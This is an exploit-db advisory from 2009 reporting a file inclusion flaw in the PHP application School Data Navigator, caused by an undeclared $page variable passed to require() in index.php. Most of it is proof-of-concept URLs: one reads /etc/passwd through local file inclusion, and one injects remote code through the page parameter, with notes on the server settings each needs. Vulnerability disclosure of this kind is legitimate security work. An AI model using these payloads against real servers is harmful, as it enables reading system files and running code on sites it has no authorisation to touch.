exploit-db-mirror/exploits/php/webapps/8924.txt

----------------------------------------------------------------------------------------------------

  Name : School Data Navigator
  Site : http://sourceforge.net/projects/school-data-nav/
  Down : http://216.92.6.173/data_navigator/app_and_readme.zip

----------------------------------------------------------------------------------------------------


  Found By : br0ly
  Made in  : Brasil
  Contact  : br0ly[dot]Code[at]gmail[dot]com

----------------------------------------------------------------------------------------------------

  Description:

  Bug : Local/Remote File Inclusion

  Look this: index.php:48:    require($page); The variable was not declared properly.

  If allow_url_fopen=on   --> RFI;
  If magic_quotes_gpc=off --> LFI;



----------------------------------------------------------------------------------------------------

  P0c:

    LFI:http://localhost/Scripts/app_and_readme/navigator/index.php?page=/etc/passwd
    RFI: http://localhost/Scripts/app_and_readme/navigator/index.php?page=[EVIL_CODE]

  OBS: need register_globals=on;

----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-06-10]